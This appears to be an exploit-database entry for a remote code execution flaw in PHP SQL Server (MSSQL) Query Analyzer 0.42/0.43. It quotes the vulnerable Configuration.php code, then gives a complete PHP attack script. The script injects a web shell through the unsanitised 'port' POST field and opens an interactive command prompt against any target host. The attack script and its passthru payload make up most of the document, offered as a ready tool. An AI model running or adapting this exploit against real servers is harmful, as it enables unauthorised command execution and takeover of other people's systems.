PHP SQL Server (MSSQL) Query Analyzer Remote Code Execution

2012-03-28T00:00:00
ID 1337DAY-ID-17847
Type zdt
Reporter Adel SBM
Modified 2012-03-28T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            <?php
/*
+------------------------------------------------------------------+
+ PHP SQL Server (MSSQL) Query Analyzer Remote Code Execution      +
+------------------------------------------------------------------+
 
Web-App        : PHP SQL Server (MSSQL) Query Analyzer v(0.42 /0.43)
Vendor         : http://phpqueryanalyze.sourceforge.net/
Vulnerability  : Remote Code Execution
Author         : Adel SBM
Website        : www.The-code.tk
Tested on      : Windows XP SP2
Greetz         : Inj3ct0r Milw0rm Exploit DataBase 1337day.com
                        
+-------------------------------------------------------------------+
+                         Algeria                                   +
+                        05/03/2012                                 +
+-------------------------------------------------------------------+

    [-] vulnerable code in Configuration.php

009 if (!empty ($_POST['save']))
010    {
011        $db_hostname = $_POST['db_hostname'];
012        $port = $_POST['port'];
013        $db_name = $_POST['db_name'];
014        $username = $_POST['username'];
015        $password = $_POST['password'];
016        
017        $data = "<?php\n/*\nPHP Query Analyzer\n\nGenerated by Configuration.php\non ".date('r')."\n/\n\n\$db_hostname='{$_POST['db_hostname']}';\n\$port={$_POST['port']};\n\$db_name='{$_POST['db_name']}';\n\$username='{$_POST['username']}';\n\$password='{$_POST['password']}';\n\n?>";
018        
019        $handle = @fopen('db.vars.php', "w+");
020        @fwrite($handle, $data);
021        @fclose($handle);         
022    }
023    
024    
025    include ('db.vars.php');

        An attacker might be able to inject and execute PHP code through $_POST['port'] (db.vars.php) file..
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}

print "\n+------------------------------------------------------------------------+";
print "\n| PHP SQL Server (MSSQL) Query Analyzer Remote Code Execution BY:AdelSBM |";
print "\n| Greetz to: The Don & Over-X & ind0ushka ..                             |";
print "\n| TeaM Official website: www.The-code.tk                                 |";
print "\n| Algeria                                                                |";
print "\n+------------------------------------------------------------------------+\n";

if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /phpqa/\n";
die();
}

$host = $argv[1];
$path = $argv[2];

$payload = "db_hostname=localhost&password=000&username=test&save=submit&port='';?><?php print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;?><?";
$packet  = "POST {$path}Configuration.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$path}db.vakrs.php\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Content-Length: ".(strlen($payload)-1)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

while(1)
{
print "\[email protected]# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$html  = http_send($host, sprintf($packet, base64_encode($cmd)));
$shell = explode("_code_", $html);
preg_match("/_code_/", $html) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n");
}
else break;
}

?>



#  0day.today [2018-01-10]  #